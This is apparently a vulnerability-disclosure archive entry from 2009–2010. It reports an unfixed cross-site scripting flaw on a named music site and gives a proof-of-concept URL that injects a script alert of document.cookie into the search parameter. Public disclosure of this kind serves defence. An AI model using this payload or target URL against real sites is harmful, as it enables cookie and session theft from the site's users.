Security researcher Darkc0ke, has submitted on 17/10/2009 a cross-site-scripting (XSS) vulnerability affecting www.efreemusic.net, which at the time of submission ranked 0 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/07/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 17/10/2009 |
Date published: 07/07/2010 |
Fixed? Mail us! | Status: UNFIXED |
Author: Darkc0ke |
Domain: www.efreemusic.net |
Category: XSS |
Pagerank: 0 |
URL: http://www.efreemusic.net/search.php?uid=ws1047e4d5a24cc826.92070084&src=&term=<script>alert(documen t.cookie)</script>&args=qs=06oENya4ZG1YS6vOLJwpLiFdjG91IC1Zn108rFpaeFeAViyAh3ZTJXSjpYodVVd7x6Bh04zea I7Kgjc8fwvsydZF76xTgTcLNPT8-MbdoTiJfX57Y4OEvwNi7J5goYj6zjkopMxHb26y3APGD0DJ8efnkFBX2RNef4oWu-8xAX3Cb Ko6ru8pQqPHs222gkdwYTcnAtTmLsTiWekyEUBOF9gtW1dF2IXrD2GBaY1CPaK-c.,YT0z&sec=tb |
Click here to view the mirror
|
|
|